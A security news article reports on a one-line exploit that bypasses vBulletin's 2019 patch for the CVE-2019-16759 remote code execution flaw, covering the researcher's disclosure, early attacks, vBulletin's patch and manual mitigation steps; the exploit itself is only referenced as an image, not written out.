A simple one-line exploit has been published for a zero-day pre-authentication remote code execution (RCE) vulnerability in the vBulletin forum software.
vBulletin is an immensely popular online forum software utilized by large brands such as Electronic Arts, Zynga, Sony, Pearl Jam, NASA, Steam, and many more.
In September 2019, an unknown security researcher disclosed a zero-day RCE vulnerability
in vBulletin's versions 5.0 through 5.4, which was tracked as CVE-2019-16759
Using this vulnerability, attackers
could remotely exploit a bug in vBulletin's PHP Module
to execute any PHP command on the remote server without logging into the forum.
This vulnerability was given a 'Critical' severity rating of 9.8/10 due to its ease of use and its ability to remotely execute commands on vulnerable vBulletin servers.
Yesterday, security researcher Amir Etemadieh (Zenofex
) disclosed a new zero-day vBulletin exploit
that bypasses the patch issued in 2019 for the original CVE-2019-16759 vulnerability.
This exploit is ridiculously easy to use and allows anyone to remotely execute commands using a single one-line command that sends a POST request to a vBulletin server, as illustrated in the image below.
PoC of vBulletin zero-day
In a conversation with BleepingComputer, Etemadieh stated that he publicly disclosed the vulnerability as vBulletin failed to properly patch it the first time and he was able to offer a mitigation as part of the disclosure.
"I felt that with it having already been a critical vulnerability that they failed to patch a year prior. Releasing full disclosure was the best path."
"I also provided a fix with the disclosure to allow any customers a quick method to immediately prevent an attacker from being able to reach the vulnerable code."
"Companies need to take security seriously, researchers cannot constantly provide free labor to identify vulnerabilities."
"Something I always like to point out to the public is that, I do not create the vulnerabilities in the code, I only provide the free labor to expose them," Etemadieh told BleepingComputer.
Attacks began immediately
Soon after the zero-day was published, vBulletin sites were already under attack.
According to Jeff Moss, aka The Dark Tangent and the creator of the Black Hat and Defcon security conferences, the defcon.org
forum was attacked with this exploit three hours after it was disclosed.
vBulletin's forum also went offline earlier today as they were presumably applying a patch to fix the vulnerability.
vBulletin releases a quick fix for zero-day bug
Due to the ease of use and severity of this vulnerability, BleepingComputer decided to hold off on reporting about it until a patch was available.
As of this afternoon, vBulletin has released a patch that disables the PHP module in vBulletin to mitigate the vulnerability.
"All older versions should be considered vulnerable. Sites running older versions of vBulletin need to be upgraded to vBulletin 5.6.2 as soon as possible. For more information on upgrading please see Quick Overview: Upgrading vBulletin Connect
in the support forums," vBulletin's advisory notes
vBulletin states that this module will be removed entirely in version 5.6.4.
For users who are running production servers, you can also mitigate the vulnerability by performing the following steps:
Put the site into debug mode
Log into the AdminCP.
Go to Styles -> Style Manager.
Open the template list for the MASTER style.
Scroll to the bottom where it says Module Templates.
Highlight the widget_php module.
Click the Revert Button.
This will completely delete the template from your site and make the PHP Module inoperative.
All vBulletin users should immediately install the patch or apply the mitigation steps above before their servers are compromised by hackers.
Update 8/10/20: Added statement from Amir Etemadieh.